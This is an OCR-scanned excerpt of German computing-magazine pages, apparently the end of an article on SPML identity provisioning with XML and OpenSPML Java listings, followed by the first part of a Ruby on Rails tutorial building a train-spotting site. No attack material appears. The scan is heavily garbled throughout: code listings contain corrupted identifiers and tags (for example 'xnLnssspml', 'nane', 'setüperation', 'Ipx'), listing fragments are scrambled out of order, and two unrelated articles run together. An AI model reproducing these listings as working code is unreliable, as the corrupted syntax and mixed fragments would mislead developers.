Requests) an einen Provisio- 
ning Service Provider (PSP), 
den üblicherweise ein zentrales 
Identity-Management-System 
bereitstellt. Der PSP nimmt die 
Anfrage entgegen und führt sie 
aus unter Einbindung der von 
ihm verwalteten PSTs (Ver- 
zeichnisdienste, Datenbanken 
et cetera). 


Autorität 
in den Prozessen 


Abhängig vom gewählten Ver- 
arbeitungsmodus lässt der PSP 
die Requesting Authority so- 
lange auf die Rückmeldung 
(SPML Response) warten, bis 
alle von der Anfrage betroffe- 
nen PSTs ihrerseits die Arbeit 
beendet haben (synchrone Ver- 
arbeitung). Mit SPML kann die 
Requesting Authority durch 
Angabe des optionalen Attri- 
buts executionMode=asyn- 
chronous’ eine asynchrone Va- 
riante der Operation beim PSP 
anfordern, was diesen dazu 
veranlasst, zunächst nur mit 
einer kurzen Empfangsbestä- 
tigung zu antworten und erst 
im Anschluss mit der Bearbei- 
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Benutzerverwaltung 


Listing 1 


sspml:addRequest targetId="Portal" 
xnLnssspml="urnzoasisinamesste:SPML:2:0"> 
<spnl:data> 
<user> 

<name>John Smith</nane> 
sid>jsmiths/id» 
senail>john. smithdacne.con</email> 
<phone> 


</phone> 
<luser> 
</spml:data> 
</spml:addRequest> 
obu:Anlage eines Benutzerkontos mit SPML Add Request 
(Listingt*) 


<home>12345</home> 
<work>54321</work> 


Anlage eines Benutzer- 
kontos mit SPML Add 
Request 


<spml:addResponse status="spml:success" 
xnns:spnl="urnzoasissnamesitesSPpNL:2:0" /> 
<spml:pso> 

<spml:psold 1D="4711" targetId="portal"/> 

</spml:pso> 

</spml:addResponse> 

abu:SPML Add Response des Provisioning Service Provider 

(Listingk*2) 


SPML Add Response des 
Provisioning Service 
Provider 


tung zu beginnen. Über die 
status-Operation ist die Re- 
questing Authority jederzeit in 
der Lage, den aktuellen Bear- 
beitungsstand abzufragen und 
mit cancel die Ausführung 
vorzeitig zu stoppen. 

Listing 1 zeigt einen exem- 
plarischen SPML Request, 
der ein neues Benutzerkonto 
(PSO) über die Core Opera- 
tion add auf dem Zielsystem 
(PST) mit der eindeutigen Be- 
zeichnung (targetID) „Portal“ 
anlegt. Die zugehörigen Iden- 
titätsdaten werden als XML- 
Dokument mit dem Wurzel- 


Personalsystem 


element <user> übergeben 
und müssen dem gültigen Da- 
tenmodell des PSOs entspre- 
chen. Das zugehörige XML 
Schema besorgt sich die Re- 
questing Authority zuvor über 
die Basisoperation listTargers. 

Da alle Interaktionen zwi- 
schen den logischen Kompo- 
nenten im SPML-Domänen- 
modell auf einem Request/ 
Response-Protokoll beruhen, 
quittiert der PSP den addRe- 
quest mit der zugehörigen add- 
Response (Listing 2). Die gibt 
Auskunft über den aktuellen 
Bearbeitungsstatus (success, 
failure oder pending) und lie- 
fert bei synchroner Ausfüh- 
rung zudem das vom PST ver- 
gebene Kennzeichen (psolD) 
mit, unter dem sich das PSO 
nach dem erfolgreichen Erstel- 
len in allen nachfolgenden 
Provisionierungsoperationen 
(etwa der Zuordnung von Be- 
rechtigungen) eindeutig refe- 
renzieren lässt. 

SOAP über HTTP ist die 
geläufigste Variante für den 
Austausch von SPML-Nach- 
richten. Alle erhältlichen Im- 
plementierungen unterstützen 
dieses in SPML als SOAP/ 
HTTP Binding bezeichnete 
Transportverfahren, das den 
SPML Request beziehungs- 
weise die SPML Response im 
SOAP Body übermittelt. Das 
schafft Vorteile: Zum einen 
lassen sich die Nachrichten mit 
allen etablierten Sicherungsme- 
chanismen für Webservices auf 
Transport- und Nachrichten- 
ebene schützen [1], zum ande- 
ren ermöglichen standardisierte 


Datenbank 


Verzeichnis 


Anwendung 


Die Rollen nach dem SPML-Domänenmodell sollen den 
Aufbau eines systemunabhängigen Provisionierungs- 


szenarios erlauben (Abb. 1). 


122 


Nachrichten und Transport- 
protokolle die unternehmens- 
übergreifende Versorgung mit 
Identitätsdaten (Federated 
Identity Provisioning). Ange- 
sichts immer stärker verzahn- 
ter Lieferketten lassen sich so 
beispielsweise Systeme bei 
Lieferanten und Partnern in 
die Provisionierungsprozesse 
einbinden. Mit proprietären 
Konnektoren ist das kaum zu 
bewerkstelligen. 


Unterstützung 
ist gefragt 


Im Idealfall unterstützen alle 
logischen Komponenten des 
SPML-Domänenmodells das 
Protokoll. Derzeit fühlt sich je- 
doch vorrangig die überschau- 
bare Gemeinde der Hersteller 
von Identity-Management-Sys- 
temen wie Sun (Java System 
Identity Manager), CA (eTrust 
Admin) oder Beta Systems 
(SAM Virtual Directory) beru- 
fen, standardkonforme SPML- 
Schnittstellen in ihren Produk- 
ten anzubieten. Nicht ohne 
Grund, denn schließlich ver- 
spricht der breite Einsatz von 
SPML, den Aufwand für das 
Entwickeln plattformspezifi- 
scher Konnektoren und Agen- 
ten zu reduzieren. Die An- 
wendungsanbieter halten sich 
dagegen noch bedeckt. SAP 
bietet als einer der wenigen die 
Möglichkeit, die Benutzer- und 
Rollenverwaltung im Netwea- 
ver Application Server Java ab 
Version 6.40 über eine SPML- 
1.0-Schnittstelle zu steuern. 
Streng genommen nimmt ein 
solches Zielsystem (PST), das 
SPML direkt verarbeiten kann, 
in einer Doppelrolle auch die 
Funktionen eines PSP wahr. 
Gleiches gilt für ein Identity- 
Management-System bezie- 
hungsweise PSP, das zugleich 
als Requesting Authority agiert, 
wenn es nicht nur eingangs- 
seitig SPML akzeptiert, son- 
dern auch ausgangsseitig über 
das Protokoll mit den PSTs 
kommuniziert. 

Um SPMIL-fähige Clients 
ist es zumindest unter Java 
gut bestellt. Das quelloffene 
OpenSPML Tookkit lässt sich 


unter den Bedingungen der 
Common Development and 
Distribution License (CDDL) 
in Java-Anwendungen als Re- 
questing Authority einbinden. 
Sein für beide Versionen des 
Standards verfügbares Java- 
Archiv (JAR) liefert die not- 
wendigen Klassen, die auf 
Objektebene SPML Requests 
erzeugen beziehungsweise die 
Antworten des PSP als Objek- 
te erhalten, ohne dass man sich 
um die aufwendige Serialisie- 
rung/Deserialisierung küm- 
mern muss. Neben jeweils ei- 
genen Klassen für die Anfrage 
und Antwort zu jeder Opera- 
tion (zum Beispiel AddRe- 
quest, AddResponse) steht ein 
fertiger SOAP Client zur Ver- 
fügung, der die Nachrichten, 
wie im SOAP/HTTP Binding 
beschrieben, an einen PSP 
schicken kann. Listing 3 zeigt, 
wie sich mit dem OpenSPML 
Toolkit der Benutzer mit der 
eindeutigen ID jsmith der 
Gruppe Administrators mittels 
modify-Operation zuordnen 
lässt. Es handelt sich um eine 
Provisionierungsanfrage an ein 
SAP-System [2]. 

Nur an einer Stelle weist 
der Code ein plattformspezi- 
fisches Merkmal auf: Das At- 
tribut, über dessen Inhalt sich 
die Benutzerzuordnung ver- 
walten lässt, trägt die Bezeich- 
nung member. Diese auf der 
Grundlage von PST-eigenen 
Identitätsattributen vorgenom- 
mene Assoziation zwischen 
zwei Provisioning Service 
Objects (hier Benutzer und 
Gruppe) hat man als grund- 
sätzliches Problem von SPML 
1.0 erkannt und in der aktuel- 
len Version durch die generi- 
sche Reference Capability be- 
hoben. Nach Zuordnung des 
Benutzers jsmith zum richti- 
gen Gruppenattribut im Kon- 
struktor der Klasse Modifica- 
tion erhält der PSP über die 
Methode setOperation die 
Nachricht, dass es sich um ei- 
ne Erweiterung der Gruppen- 
mitgliedschaften handelt (OP_ 
ADD). Ohne weiteres Zutun 
kann das modifyRequest-Ob- 
jekt nun mit seiner Methode 
10XML() dafür sorgen, dass ei- 
ne standardkonforme SPML- 
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Identifier identifier = new Identifier(); 


modifyRequest.setldentifier(identifier); 


"USER. PRIVATE_DATASOURCE „un: jsmith"); 


OpensPML Toolkit (Listingk*3) 


. sspml:modifyRequest xmlns:dsnl="..." xmlnszspml="..."> 
Zuordnung eines <spnl:identifier xnlnssspnl="" 
Benutzers zu einer type="urnsoasissnamesztc:SPpML:1:0#Genericstring"> 
N <spnl:id xnlnszspnl=""> 
Gruppe mit dem GRUP.PRIVATE_DATASOURCE ‚un: Adninistrators 
{] </spnl:id> 
OpenSPML Toolkit <Ispnl:identifier> 


sspml:modifications xmlns:spnl=""> 
<dsml:nodification name="member" operation="add"> 
<dsml:value xmlns:dsnl=""> 
USER.PRIVATE_DATASOURCE .un: jsmith 
</dsnl:value> 
</dsnl:modification> 
te </spml:modifications> 
Serialisierter SPML <IspnlnodifyRequest> 
obu:Serialisierter SPML 1.0 Request (Listingtk4) 


NodifyRequest modifyRequest = new ModifyRequest(); 


identifier.setType(Identifier.TYPE_Genericstring); 
identifier.setld("GRUP.PRIVATE_DATASOURCE.un:Adninistrators"); 


Nodification modification = new Modification("nenber", 
modification. setüperation(Nodification.OP_ADD); 


modifyRequest.adaNodification(modification); 
abu:Zuordnung eines Benutzers zu einer Gruppe nit den 


1.0 Request 


Nachricht erzeugt wird (Lis- 
ting 4). 


Fazit 


SPML erleichtert die Verwal- 
tung verteilter Benutzerinfor- 
mationen in komplexen Sys- 
temen. Die Sprache adaptiert 
verwandte Sicherheitsstandards 
wie SAML (Security Assertion 
Markup Language) [3] und 
XACML (eXtensible Access 
Control Markup Language) 
für die plattformübergreifen- 
de Formulierung von Berech- 
tigungsregeln und schließt eine 
wichtige Lücke beim Identity 
Provisioning. Trotz ihrer Ak- 
zeptanz bei den Herstellern von 
den Identity-Management-Sys- 
temen wäre es gut, wenn sich 
die Anbieter von Applikations- 
servern hier anschließen wür- 
den. Denn ihre Produkte spie- 
len eine zentrale Rolle für das 
Identity Provisioning. Zurzeit 
arbeitet OASIS an einem En- 
terprise Provisioning Profile, 
das analog zu den Richtlinien 
der Web-Services-Interopera- 


bility-Organisation eine besse- 
re Zusammenarbeit zwischen 
den unterschiedlichen Imple- 
mentierungen des Standards 
definieren soll. (jd) 
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Rails-Tutorial I: Einrichten und anpassen 


Außergewöhnlic 
auf Schienen 


Denny Carl 


Die professionelle Entwicklung von Webanwendungen 
erleichtern Web-Frameworks wie das immer beliebtere Ruby 
on Rails. Das MVC nutzende Framework propagiert unter 
anderem Konventionen einzuhalten statt zu konfigurieren. 
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uby on Rails hat mächtig Fahrt 
Rennen wenngleich die 

Begeisterung in hiesigen Ent- 
wicklerkreisen im Vergleich zu den 
USA oder Großbritannien eher zurück- 
haltend ist. Das mit diesem Artikel be- 
ginnende Tutorial beschäftigt sich mit 
der Entwicklung einer realen Webap- 
plikation und soll zeigen, dass sich der 
Einstieg und Umstieg auf Ruby on 
Rails und damit auf effizientes, gut or- 
ganisiertes Coding für das Web aus ei- 
nem Guss lohnt. 

Mit dem Tutorial entsteht Train- 
spotr, eine Community für Menschen, 
die in ihrer Freizeit auf der Jagd nach 
teils seltenen, teils alltäglichen Zügen 
und Lokomotiven gehen und dies mit 
Fotos dokumentieren. Das erlaubt ei- 
nen Einblick in die Entwicklung einer 
datenbankgestützten Anwendung mit 
Rails und die Implementierung von 
Features wie durch Login geschützte 
Bereiche, Datei-Upload, Bewertungen 
und Geotagging. Zudem zeigt sich 
bald, wie gekonnt Ajax in Ruby on 
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Rails eingeflochten ist und wie schnell 
ein Admin-Bereich zur internen Pflege 
der Nutzerdaten dank Scaffolding ent- 
steht. In diesem ersten Teil geht es um 
das Einrichten einer Rails-Anwendung, 
das Verwalten von Daten in einer Da- 
tenbank und deren Darstellung im 
Browser. 

„Irainspotter“ und Rails-Entwick- 
ler haben eines gemeinsam: Die Be- 
geisterung für die Schiene. Für Züge 
sind Schienen der fest vorgegebene 
Weg ihrer Reise, auf denen sie eine 
hohe Geschwindigkeit erreichen kön- 
nen, wenn sie geradlinig verlaufen und 
die Züge nicht so oft abbremsen müs- 
sen. So ist das auch bei Rails: Es ist 
ein Framework für Webapplikationen, 
das dem Entwickler durch ein ausge- 
klügeltes Konzept und einige Konven- 
tionen den Weg weist. Ein Rails-Ent- 
wickler braucht ebenfalls selten zu 
bremsen, denn Rails bringt viele Fea- 
tures, die moderne Webapplikationen 
benötigen, gleich mit. Sogar Javascript 
oder SQL kann man mit Ruby und da- 
mit ohne Bremsverluste einbinden. 


Was an Rails 
so besonders ist 


Rails verfolgt das MVC-Pattern (Mo- 
del — View - Controller), wodurch der 
gesamte Programmcode sauber struktu- 
riert und leicht zu pflegen ist. Während 
sich die Geschäftslogik der Anwen- 
dung in einem Model niederschlägt, er- 
hält die View-Ebene den nötigen 
Quelltext zur Anzeige von Daten. Ein 
Controller koordiniert die Zusammen- 
arbeit, holt Daten und weist sie zur An- 
zeige an. 

Neben MVC ist DRY ein weiteres 
Zauberwort bei Rails-Entwicklern. Es 
steht für „Don’t Repeat Yourself“ und 
umfasst Funktionen und Konzepte, die 
es erleichtern, sich wiederholende 
Quelltextteile zu vermeiden. 

Durch den Grundsatz „Convention 
over Configuration“ sparen sich Rails- 
Entwickler das oftmals lästige und 


zeitaufwendige Hinterlegen von Da- 
ten, die das Zusammenwirken von ein- 
zelnen Programmteilen beschreiben. 
Rails setzt ein paar einfach zu ver- 
innerlichende Regeln voraus, an die 
sich der Entwickler halten sollte, möch- 
te er ohne Umwege schnell ans Ziel 
kommen. So erwartet es beispielsweise 
einen Zusammenhang zwischen der 
Bezeichnung eines Model und einer 
Datenbanktabelle, mit der es in Ver- 
bindung steht. Diesen Zusammenhang 
muss somit niemand festhalten. Zu 
nutzende Bibliotheken oder einzelne 
Ruby-Dateien werden automatisch 
und ohne eine Zeile Code geladen — 
sofern sie sich an der richtigen Posi- 
tion befinden. 

Eine Rails-Anwendung kann stan- 
dardmäßig in drei Umgebungen laufen: 
development, test und production. Dies 
wirkt sich beispielsweise auf den Um- 
fang von Fehlermeldungen — wichtig 
während der Entwicklung — oder die 
Intensität des Cachings von Daten aus, 
was erst im produktiven Einsatz wich- 
tig ist. Die Test-Umgebung setzt den 
gesamten Datenbestand bei jedem Test- 
lauf zurück, um stets eine gleiche Aus- 
gangsbasis für die durchzuführenden 
Tests zu gewährleisten. Jede Umge- 
bung erhält ihre eigene Datenbank und 
schreibt zudem eigene Log-Dateien. 

Weitere produktive Bestandteile im 
Rails-Framework sind die diversen, 
standardmäßig eingebauten Tests, Code- 
Generatoren und Meta-Programmier- 
elemente. Außerdem erweitern Plug-ins 
die Fähigkeiten von Rails gezielt. 
Rails-Anwendungen können nicht nur 
HTML, sondern eine ganze Reihe von 
Formaten zur Ausgabe nutzen, was die 
Bereitstellung von Webservices stark 
erleichtert. 


Einfaches Einrichten 
der Umgebung 


Ein praktisches Nachvollziehen des Tu- 
torials setzt eine Umgebung voraus, die 
über die aktuellen Ruby- und Rails- 


optionen zu pflegen. 


und das Potenzial des Framework. 


A-TRACT 


@ Ruby on Rails ist ein betriebssystemunabhängiges Web-Framework, das nach 
dem Model-View-Controller-Prinzip arbeitet. 


@ Eine Reihe von Konventionen erspart es Entwicklern, komplizierte Konfigurations- 
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Versionen (1.9 beziehungsweise 2.0), 
sowie den Paketmanager RubyGems 
und das an das C-Entwicklern bekannte 
make angelehnte Rake verfügt. Wie 
man seinen Rechner „auf die Schienen“ 
setzen kann, erläutern viele betriebssys- 
temspezifische Anleitungen im Netz 
(siehe „Onlinequellen“). 

Für Windows-Entwickler lohnt der 
Blick auf die schnell einsatzfähige 
Komplettlösung InstantRails, durch die 
Ruby, Rails, Apache, MySQL sowie 
Tools und Codebeispiele mit wenigen 
Klicks und in aktuellen Versionen ein- 
satzbereit sind. Mac OS X 10.5 bringt 
Rails von Haus aus mit. 

Es ist angebracht, vor dem Start der 
Entwicklung einer Rails-Anwendung 
alle beteiligten Komponenten auf Up- 
dates zu überprüfen. RubyGems über- 
trägt die neueste stabile Rails-Version 
durch gem update rails auf den eigenen 
Rechner — per Kommandozeile. 


Gerüst mit Verzeichnissen 


Jede Rails-Anwendung besteht zu- 
nächst aus einem Grundgerüst aus Ver- 
zeichnissen und Dateien. Dies gene- 
riert der Befehl rails, dem der Name 
der Anwendung übergeben wird. An- 
schließend erzeugt das Framework ein 
Unterverzeichnis mit diesem Namen. 
Des Weiteren erstellt es die Verzeich- 
nisstruktur der Anwendung, kopiert be- 
nötigte Dateien und setzt die Konfigu- 
rationseinstellungen auf Standardwerte. 
Die Anwendung befindet sich zunächst 
im Environment development. 

Seit Rails 2.0 ist SQLite 3 das Da- 
tenbanksystem, das Entwickler stan- 
dardmäßig wegen seiner einfachen 
Handhabung nutzen sollen. Zuvor war 
es MySQL. Wer dieses System mit 
der aktuellen Version als Datensilo 
nutzen will, muss eine Rails-Anwen- 
dung mit dem Parameter -d mysql er- 
zeugen. Das Framework unterstützt 
darüber hinaus eine Vielzahl weiterer 
Datenbanksysteme. 

Da Trainspotr MySQL verwenden 
soll, heißt das Abfahrtssignal für die 
Entwicklung rails -d mysql trainspotr. 
Anschließend lohnt ein Blick in die er- 
zeugten Dateien und Verzeichnisse. 

Im Verzeichnis app (in trainspotr) 
ist das MVC-Prinzip wiederzuerken- 
nen. In public finden Dateien Platz, die 
Rails direkt an den Browser liefert, oh- 
ne sie vorher dem Ruby-Interpreter 
vorzusetzen — etwa CSS-, Javascript- 
oder Bilddateien. Die wenigen Konfigu- 
rationsdateien befinden sich in config, 
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im Verzeichnis db landen später Be- 
schreibungen für Datenbanktabellen. 
Das lib-Verzeichnis ist der richtige 
Ort für Ruby-Skripte, die Entwickler 
außerhalb von Modellen, Controllern 
oder Views schreiben möchten. 


Konfigurieren 


der Verbindung 


Die Verbindungs- und Zugangsdaten für 
die MySQL-Datenbank müssen in con- 
fig/database.yml stehen (siehe Lis- 
ting 1). Der Inhalt dieser Datei ist in 
YAML verfasst, einer gern in Rails-An- 
wendungen verwendeten Markup-Spra- 
che, die es erlaubt, leicht lesbare Konfi- 
gurationsdateien oder Test-Fixtures zu 
notieren. Für jedes Environment kann 
hier eine eigene Datenbank angegeben 
werden. Zu beachten ist die Besonder- 
heit der Test-Umgebung, die zwingend 


Listing 1: config/database.yml 


development: 
adapter: mysql 
encoding: utf8 
database: trainspotr_development 
username: root 
password: 
host: localhost 
test: 
adapter: mysql 
encoding: utf8 
database: trainspotr_test 
username: root 
password: 
host: localhost 
production: 
adapter: mysql 
encoding: utf8 
database: trainspotr_production 
username: root 
password: 
host: localhost 


Listing 2: HTML 


<!DOCTYPE htnl 
PUBLIC "-//WSC/IDTD XHTML 1.0 Transitional//EN" 
"https //muw.w3.org/TR/xhtnl1/DTD/xhtml1-transitional.dtd"> 
<htnl> 
<head> 
stitle>Trainspotr</title> 
<neta http-equiv="content-type" content="text/htnl; charsetzutf-8"> 
<link rel="stylesheet" type="text/css" href=" Layout.css"> 
</head> 
<body> 
<div id="page"> 
<div id="header"> 
<h1>Trainspotr</h1> 
<ldiv 
<div id="nav_urapper"> 
<div id="nav"> 
(NV) 
<ldiv 
<ldiv 
<div id="nain_wrapper"> 
<div id="nain"> 
(MAIN) 
<ldiv 
<ldiv 
<div style="clear: both"></div> 
<div id="footer"> 
(FOOTER) 
<ldiv 
<idiv 
</body> 
</htnl> 


eine eigene Datenbank erhalten sollte, 
falls man die eingebauten Rails-Tests 
durchführen und Daten eines anderen 
Environments nicht gefährden will. 

Sollten die in Listing 1 angegebenen 
Datenbanken noch nicht existieren, 
kann der im Terminal abgesetzte Be- 
fehl rake db:create die Erzeugung der 
development-Datenbank veranlassen. 
Um die benötigten Tabellen in dieser 
Datenbank soll es gleich gehen. 

Schon jetzt können Entwickler ihre 
Rails-Anwendung starten. Den mitge- 
lieferten Webserver Mongrel und da- 
mit gleichsam die Anwendung startet 
ruby script/server. Unter http://local- 
host:3000 lässt sich die Anwendung 
nun aufrufen. Zum jetzigen Zeitpunkt 
ist lediglich die Rails-Infoseite zu se- 
hen. Ein Klick auf „About your appli- 
cation’s environment“ sollte keine 
Fehlermeldung zeigen, sondern De- 
tails zu verwendeten Komponenten — 
das heißt, es besteht eine funktions- 
tüchtige Verbindung zur Datenbank. 
Ein Blick ins Terminal offenbart schon 
jetzt Auskünfte über das Geschehen 
hinter den Kulissen der Anwendung, 
beispielsweise über die HTTP-Request- 
Methode, welche Parameter dem Server 
übergeben wurden, welche Controller 
und welche Action der Rails-Anwen- 
dung dadurch angesprochen und wel- 
che Datenbank-Queries erzeugt wur- 
den. Mongrel lässt sich durch Strg+C 
beenden. 


Optisches Layout 
der Anwendung 


Bevor es an die eigentliche Entwick- 
lung der Programmlogik geht, emp- 
fiehlt es sich, einen Rahmen, ein 
Grundlayout mit HTML und CSS zu 
bauen, das die Ausgaben der Anwen- 
dung aufnimmt und Benutzerschnitt- 
stellen anbietet. In diesem Fall soll es 
ein einfaches zweispaltiges Layout 
sein, wobei die linke Spalte Naviga- 
tionselemente beinhalten wird. Hea- 
der- und Footer-Bereich ergänzen den 
Aufbau (siehe Listing 2). 

Für das Layout, das man auf her- 
kömmliche Weise, außerhalb der Rails- 


Listing 3: layout.css 


#page { width: 950px; border: Ipx solid black; } 

#header { border-botton: Ipx solid black; } 

#nav_urapper { width: 197px; float: left; } 

#main_urapper { width: 750px; float: left; 
border-Left: Ipx solid black; } 

#nav, #nain { margin: 0px; } 

#footer { border-top: Ipx solid black; } 
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Anwendung, gestalten kann, ist es 
sinnvoll, eine externe CSS-Datei anzu- 
legen. Listing 3 legt zunächst lediglich 
Wert auf einen Rahmen, weniger auf 
die optische Gestaltung. Im Bereich 
main wird die Anwendung später den 
Großteil aller Ausgaben platzieren. In 
layout.css sind hauptsächlich Informa- 
tionen enthalten, die die Anordnung 
der einzelnen Container header, nav, 
main und footer betreffen. 

Nun kann das GUI-Gerüst in die 
Anwendung integriert werden. Rails 
erwartet derartige Grundlayouts in 
app/views/layouts. Listing 2 sollte dort 
als application.himl.erb liegen. Die 
Verwendung dieses Dateinamens teilt 
Rails mit, dass das Layout für die ge- 
samte Anwendung gelten soll. Dies ist 
eine der eingangs erwähnten Konven- 
tionen, die Konfigurationsdaten er- 
spart. Durch die Dateiendung .erb 
„weiß“ Rails, dass diese Datei einge- 
betteten Ruby-Code enthält, den erst 
noch das Template-System ERb (Em- 
bedded Ruby) interpretieren muss. Da- 
zu gleich mehr. 

Für CSS-Dateien gibt es ebenfalls 
einen festen Platz. Da der Server sie 
ohne Verarbeitungsschritte direkt an 
den Browser ausliefert, sollten sie im 
Verzeichnis public und dort im Unter- 
verzeichnis stylesheets vorliegen. ap- 
plication.html.erb muss nun die Ver- 
bindung zu eben dieser CSS-Datei 
wieder herstellen. Rails übernimmt die- 
se Aufgabe über den Befehl style- 
sheet_link_tag. 

Hierbei handelt es sich um einen 
von unzähligen Helpern, die Rails für 
die Verwendung in Ansichten, den 
Views, zur Verfügung stellt und die 
beispielsweise Grafiken und Java- 
script-Dateien einbinden oder Formu- 
lare und HTML-Tags erzeugen - alles 
mit Ruby. 

Ruby-Code in eine HTML-Datei 
einzubetten erfolgt durch <% ... %>. 
In application.html.erb interpretiert 
Embedded Ruby diesen Code. Gibt ei- 
ne Methode, die dort zur Ausführung 
kommt, etwas aus, bewirkt <%= ... 
%> diese Ausgabe — wie bei style- 
sheet_link_tag, was ein link-Element 
für eine CSS-Datei erzeugt, deren 
Pfad die von Rails erzeugte Anwen- 
dungsstruktur berücksichtigt. Man sollte 
daher das link-Element in applica- 
tion.html.erb durch <%= stylesheet 
_link_tag 'layout' %> ersetzen. Die ein- 
zubindende CSS-Datei wird als Parame- 
ter und ohne Dateiendung hinterlegt. 

yield innerhalb des Layouts legt 
fest, wohin Rails die Ausgaben der 
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Anwendung schreiben soll. Im vorlie- 
genden Fall ersetze man den Platzhalter 
(MAIN) deshalb durch <%= yield %>. 
Selbstverständlich lassen sich mehrere 
Stellen innerhalb des Layouts definie- 
ren, an denen Daten ausgegeben wer- 
den sollen. 


Einstieg ins Controlling 
dank ActionPack 


Da die Anwendung noch keinen Con- 
troller hat, der ihre Ausgaben organi- 
siert und die dafür nötigen Daten be- 
sorgt, kann man das Layout noch nicht 
in Aktion sehen. Ein Controller, dessen 
Aufgabe es sein soll, die Startseite der 
Anwendung bereitzustellen, soll das 
ändern. 

Controller sind in Rails Klassen, die 
von anderen Klassen des Subframe- 
works ActionPack erben. Controller 
kapseln hauptsächlich die Steuerungs- 
logik der Anwendung. Die Steuerung 
eines Controllers erfolgt über diverse 
Aktionen, die innerhalb der Klasse als 
Methoden implementiert werden. Ty- 
pischerweise bildet ein Controller 
CRUD-Operationen (Create, Read, Up- 
date, Delete) durch Actions ab, aber 
dies ist nicht zwingend erforderlich. 
Der Controller Home soll lediglich die 
Action index enthalten, die wiederum 
einen Willkommenstext zur Anzeige 
bringt. Diesen Controller und diese Ac- 
tion generiert ein ruby script/generate 
controller Home index. 

Rails zeigt die generierten Dateien 
an. Die Controller-Klasse wurde in 
appl/controllers/home_controller.rb er- 
zeugt. Die Bezeichnung der Klasse 
setzt sich aus dem bei der Generie- 
rung angegebenen Namen und dem 
Zusatz Controller zusammen. Die 
Klasse besitzt schon die leere Metho- 
de index, um die es nun gehen soll. In 
ihr werden nun zwei lokale Variablen 
erzeugt, @headline und @message, 
deren Inhalte beim Aufruf der Action 
index des Controllers zur Anzeige 
kommen sollen (siehe Listing 4). 

Views sind Bestandteil der Präsen- 
tationsschicht und beinhalten Teile der 


Trainspotr 


(NAVY) 


(FOOTER> 


Noch reines HTML. In die durch (MAIN) et cetera bezeichneten Bereiche kommt 


nach und nach mehr Rails (Abb. 1). 


Trainspotr 


(NAV) 


Willkommen bei Trainspotr. 


Sie haben Fotos von sehenen Loks? Teilen Sie diese mi anderen Trainspottem! 


(FOOTER> 


Navigation und Fußzeilen sind noch Demo, im Hauptbereich steht immerhin 


schon die Begrüßung (Abb. 2). 


Anwendungsoberfläche, deren Inhalte 
der Controller festlegt. Ein View kann 
beispielsweise HTML und Ruby-Code 
enthalten, der an die durch yield be- 
stimmte Stelle ins Anwendungslayout 
gesetzt wird. Views liegen standard- 
mäßig im Verzeichnis app/views und 
dort in Unterverzeichnissen, die den 
Namen des Controllers tragen. Rails 
nimmt grundsätzlich an, dass zu jeder 
Action eines Controllers ein View 
gleichen Namens in diesem Verzeich- 
nis existiert. Deshalb sollten @headline 
und @message in app/views/home/ 
index .html.erb eingefügt sein: 

<h2><%= @headline %></h2> 

<p><%= @message %></p> 


Mongrel ist nun erneut zu starten. Eine 
Rails-Anwendung ist standardmäßig so 
konfiguriert, dass eine URL des Musters 
Host/Controller/Action die Action eines 
Controllers ausführen kann — bei Bedarf 
unter Hinzufügen der ID eines Datensat- 
zes. Da es sich bei index um die Stan- 
dard-Action eines Controllers handelt, 
ist in diesem Fall ihre Angabe nicht nö- 
tig, sodass sowohl unter http://local- 
host:3000/home/index als auch unter 
http://localhost:3000/home das eben Im- 
plementierte zu erreichen ist. 

Um diese Ansicht statt der Rails-In- 
foseite auf der Startseite zu bekommen, 
die bislang noch unter http://local- 
host:3000 erscheint, ist ein Eingriff in 


Listing 4: Controller 
class HomeController < ApplicationController 
def index 
aheadline = "Willkommen bei Trainspotr." 
end 


end 


message = "Sie haben Fotos von seltenen Loks? Teilen Sie diese mit anderen Trainspottern!" 
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das eingebaute Routing der Rails-An- 
wendung erforderlich. Das funktioniert 
etwa wie mod_rewrite bei Apache und 
erlaubt, URLs auf bestimmte Control- 
ler und Actions abzubilden. Die zuge- 
hörigen Informationen sollen in con- 
fig/routes.rb liegen. In dieser Datei 
muss oberhalb des URL-Standard- 
Mapping die Zeile map.root :control- 
ler => ‚home’ stehen, damit die index- 
Action des Home-Controllers zur 
Startseite wird. Darüber hinaus müssen 
Entwickler die Rails-Infoseite public/ 
index.html entfernen und den Webser- 
ver Mongrel wiederum neu starten. Bei 
Änderungen an config/routes.rb ist dies 
zwingend nötig. 


Kernfunktion der 
Trainspots anlegen 


Als Nächstes soll die Anwendung ihre 
Kernfunktion erhalten — im ersten 
Schritt ohne benutzerabhängige Fea- 
tures. Es soll möglich sein, eine Zug- 
sichtung anzulegen, zu bearbeiten, zu 
betrachten und zu löschen. Alle Zug- 
sichtungen sollen in eine eigene Daten- 
banktabelle, wobei jede Zeile eine 
Sichtung enthält. Der Zugriff auf Zei- 
len dieser Datenbanktabelle erfolgt 
über ein Model. 

Jedes Model in Rails ist standard- 
mäßig eine Unterklasse von ActiveRe- 
cord::Base. Bei Active Record handelt 
es sich um ein weiteres Subframe- 
work. Eigenständig betrachtet ist es 
ein gut durchdachter objektrelationa- 
ler Mapper. Somit enthalten Rails-Mo- 
dels mit ihrer Erzeugung schon alles 
Nötige für einen unkomplizierten Da- 
tenbankzugriff, der weitgehend ohne 
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Ruby on Rails | 


die direkte Nutzung von SQL-Queries 
auskommt. 


Tabellenname als Plural 
des Bezeichners 


Dies trifft auch auf die Erzeugung von 
Datenbanktabellen zu. Denn das Gene- 
rieren eines Model impliziert gleichsam 
eine Migration. Diese ist Ruby-Code, 
der Datenbanktabellen erzeugen, lö- 
schen, ergänzen, mit Daten füllen, lee- 
ren und weitere typische Aktionen 
durchführen kann. Jede Migration be- 
steht aus zwei Methoden. Die eine 
enthält Schritte zum Durchführen, die 
andere zum Rückgängigmachen einer 
Veränderung an der Datenbank. Mit 
Migrationen existiert eine Art Ver- 
sionsverwaltung für Datenbanktabel- 
len einer Rails-Anwendung, die wäh- 


class CreateTrainspots < ActiveRecord::Migration 
def self.up 
create_table :trainspots do |t| 
t.string :train 
t.string :location 
t.date :date 
t.text :notes 
t.tinestanps 
end 
end 
def self.doun 
drop_table :trainspots 
end 
end 


Listing 6: app/views/ 
trainspots/new.html.erb 


<h2>Neue Zugsichtung anlegen</h2> 
<h= error_messages_for :trainspot A> 
<ı form_for(Atrainspot) do |f| 4> 


<p>Zug oder Loksbr /> 

iz ftext_field :train A></p> 
<p>Ort der Aufnahme<br /> 

iz ftext_field :location A></p> 
<p>Datum und Uhrzeitsbr /> 

iz f.datetime_select date Z></p> 
<p>Benerkungen<br /> 

iz f.text_area inotes Z></p> 
sp><i= f.submit "Speichern" Z></p> 


<h end I> 
